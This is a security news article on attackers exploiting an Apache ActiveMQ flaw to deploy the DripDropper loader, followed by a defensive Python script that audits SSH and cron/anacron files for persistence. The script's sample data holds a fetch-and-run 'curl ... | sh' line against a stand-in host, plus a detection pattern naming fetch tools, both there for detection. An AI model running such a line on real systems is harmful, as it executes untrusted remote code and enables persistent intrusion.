
Exploitation of Apache ActiveMQ Vulnerability: DripDropper Malware Targets Cloud Linux Systems

Threat actors have been exploiting a critical security vulnerability in Apache ActiveMQ that was disclosed nearly two years ago. The flaw lets them maintain access to cloud-hosted Linux systems and deploy a malware loader known as DripDropper.

Interestingly, after gaining initial access, these attackers have been seen proactively patching the vulnerability to prevent further exploitation by other adversaries, thus reducing the chances of detection, according to a report by Red Canary.

The attacks utilize a critical remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ, rated with a maximum CVSS score of 10.0. This vulnerability, which allows arbitrary shell commands to be executed, was patched in October 2023.

Following the exploitation, the attackers modified existing SSH configurations to permit root login, allowing them to drop a previously unknown downloader named DripDropper on compromised systems. This malware, packaged as a PyInstaller Executable and Linkable Format (ELF) binary, requires a password to run, aiming to evade analysis. Additionally, it communicates with a Dropbox account controlled by the attackers, underscoring how they are increasingly using legitimate services to blend in with normal network activities.

DripDropper ultimately acts as a channel for dropping two files. The first supports a range of actions on the compromised endpoint, from process monitoring to executing commands received via Dropbox. Persistence for the dropped files is established by altering the anacron file located in various cron directories so that access survives reboots.

The second file also connects to Dropbox for command execution and modifies SSH configuration files to establish backup access methods. Notably, the attackers have been seen downloading patches for CVE-2023-46604, effectively closing the vulnerability while maintaining their operations through other persistence methods.

Although uncommon, this tactic has been previously documented. Just last month, France’s cybersecurity agency highlighted a similar strategy used by a Chinese initial access broker to secure ongoing access by patching flaws to avoid detection by others.

This incident serves as a reminder for organizations to promptly apply security patches, restrict access to internal services by configuring ingress rules for trusted IPs or VPNs, and actively monitor logs in cloud environments to identify unusual activities.
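The two host-level changes described above (SSH configuration edited to permit root login, and anacron files in the cron directories altered for persistence) are exactly the kind of drift a defender can check for routinely. The following is an added example, not Red Canary's tooling or anything from the original report: it audits an sshd_config for weak directives, compares cron/anacron file contents against a recorded baseline, and flags cron entries that fetch or run code from the network. All file contents, paths and the tampered line are constructed for illustration.

```python
"""Added example: audit sshd_config and cron/anacron files for the kinds of
persistence changes described in the article. Paths and file contents below
are constructed samples, not real indicators."""
import hashlib
import re
from typing import Dict, List


def sha256_text(text: str) -> str:
    """Hash file content so a baseline can be stored and compared later."""
    return hashlib.sha256(text.encode()).hexdigest()


# sshd_config directives whose listed values weaken access control.
RISKY_SSHD = {
    "permitrootlogin": {"yes"},
    "passwordauthentication": {"yes"},
}


def audit_sshd_config(text: str) -> List[str]:
    """Return weak directives found in an sshd_config.

    Comments are stripped and, as sshd itself does, only the first occurrence
    of a keyword is honoured, so a later 'PermitRootLogin no' cannot mask an
    earlier 'yes'.
    """
    seen = set()
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+|=", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key in seen:
            continue
        seen.add(key)
        if key in RISKY_SSHD and value in RISKY_SSHD[key]:
            findings.append(f"{parts[0]} {parts[1].strip()}")
    return findings


def diff_against_baseline(current: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Flag cron/anacron files that are new, modified, or missing versus a baseline of hashes."""
    findings = []
    for path, content in current.items():
        if path not in baseline:
            findings.append(f"new file: {path}")
        elif baseline[path] != sha256_text(content):
            findings.append(f"modified: {path}")
    for path in baseline:
        if path not in current:
            findings.append(f"missing: {path}")
    return findings


# Heuristic: scheduled jobs that pull or run code via these tools deserve a look.
FETCH_RE = re.compile(r"\b(curl|wget|python3?|base64)\b", re.IGNORECASE)


def suspicious_cron_lines(text: str) -> List[str]:
    """Return non-comment lines of a cron/anacron file that invoke fetch/interpreter tools."""
    return [
        line for line in text.splitlines()
        if line.strip() and not line.lstrip().startswith("#") and FETCH_RE.search(line)
    ]


# ---- constructed sample data (not from any real host) ----
SAMPLE_SSHD = """# constructed sshd_config sample
Port 22
PermitRootLogin yes
PasswordAuthentication no
PermitRootLogin no
"""
BASELINE_ANACRON = "1\t5\tcron.daily\trun-parts /etc/cron.daily\n"
CURRENT_FILES = {
    # constructed tampering: an extra job appended to the hourly anacron file
    "/etc/cron.hourly/0anacron": BASELINE_ANACRON + "1\t0\tupdate\tcurl -s http://example.invalid/x | sh\n",
    "/etc/cron.daily/0anacron": BASELINE_ANACRON,
}
BASELINE = {path: sha256_text(BASELINE_ANACRON) for path in CURRENT_FILES}


def run_audit() -> Dict[str, List[str]]:
    """Run all three checks over the constructed samples and return the findings."""
    report = {
        "sshd": audit_sshd_config(SAMPLE_SSHD),
        "cron_integrity": diff_against_baseline(CURRENT_FILES, BASELINE),
        "cron_content": [],
    }
    for path, content in CURRENT_FILES.items():
        for line in suspicious_cron_lines(content):
            report["cron_content"].append(f"{path}: {line}")
    return report


if __name__ == "__main__":
    for check, items in run_audit().items():
        print(check, items)
```

On a real host, the baseline hashes would be captured at deployment time and stored off-box, and the checks scheduled from a source the attacker cannot easily reach (for example, an agent rather than the very cron directories being audited). The content heuristic is deliberately broad and will produce false positives on legitimate jobs; its purpose is to surface entries for review, not to make a verdict.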
